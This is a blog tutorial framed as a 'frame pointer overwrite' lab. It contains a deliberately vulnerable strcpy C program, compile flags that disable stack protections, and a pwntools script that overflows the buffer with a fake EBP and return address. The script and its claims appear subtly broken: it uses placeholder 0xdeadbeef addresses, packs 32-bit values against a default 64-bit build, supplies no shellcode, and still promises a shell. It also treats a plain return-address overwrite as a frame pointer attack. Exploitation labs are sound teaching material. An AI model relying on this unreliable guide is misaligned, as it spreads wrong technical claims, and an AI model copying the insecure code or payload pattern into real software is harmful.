strangerRidingCaml

Frame Pointer Overwrite Attacks Lab 본문

System hacking

Frame Pointer Overwrite Attacks Lab

woddlwoddl 2024. 5. 7. 17:26
728x90
Frame Pointer Overwrite Attacks Lab

Frame Pointer Overwrite Attacks Lab

In this lab, we will learn how to exploit vulnerabilities to overwrite frame pointers and gain control of program flow.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a buffer overflow vulnerability.


  #include <stdio.h>
  #include <string.h>

  void vulnerable_function(char *input) {
      char buffer[64];
      strcpy(buffer, input);
  }

  int main(int argc, char *argv[]) {
      if (argc != 2) {
          printf("Usage: %s <input>\n", argv[0]);
          return 1;
      }

      vulnerable_function(argv[1]);

      printf("Program executed successfully.\n");
      return 0;
  }

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to exploit the frame pointer overwrite vulnerability.


  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Address of function to return to
  return_address = 0xdeadbeef  # Example address (change as needed)

  # Offset to return address
  offset = 72

  # Fake frame pointer value
  fake_ebp = 0xdeadbeef  # Example value (change as needed)

  # Craft the payload
  payload = b'A' * offset
  payload += p32(fake_ebp)  # Fake frame pointer
  payload += p32(return_address)  # Return address

  # Launch the exploit
  p = process(binary_path)
  p.sendline(payload)
  p.interactive()

Explanation of the Python script:

  • We specify the address of the function to return to and the fake frame pointer value.
  • The payload consists of padding, followed by the fake frame pointer value and the return address.
  • We launch the vulnerable binary and send the payload to trigger the frame pointer overwrite exploit.
  • p.interactive() allows us to interact with the spawned shell.

3. Exploiting the Vulnerability:

Execute the Python script to exploit the buffer overflow vulnerability:

$ python exploit.py

Once executed, you should have a shell prompt, confirming the successful exploitation of the frame pointer overwrite vulnerability.

'System hacking' 카테고리의 다른 글

Sigreturn-Oriented Programming (SROP) Lab  (0) 2024.05.08
Return-Oriented Programming (ROP) Lab  (0) 2024.05.07
Frame Faking and Fake EBP Lab  (0) 2024.05.07
Return-to-Libc (RTL) Exploits Lab  (0) 2024.05.07
Return-to-Shellcode Attacks Lab  (0) 2024.05.07
'System hacking' Related Articles more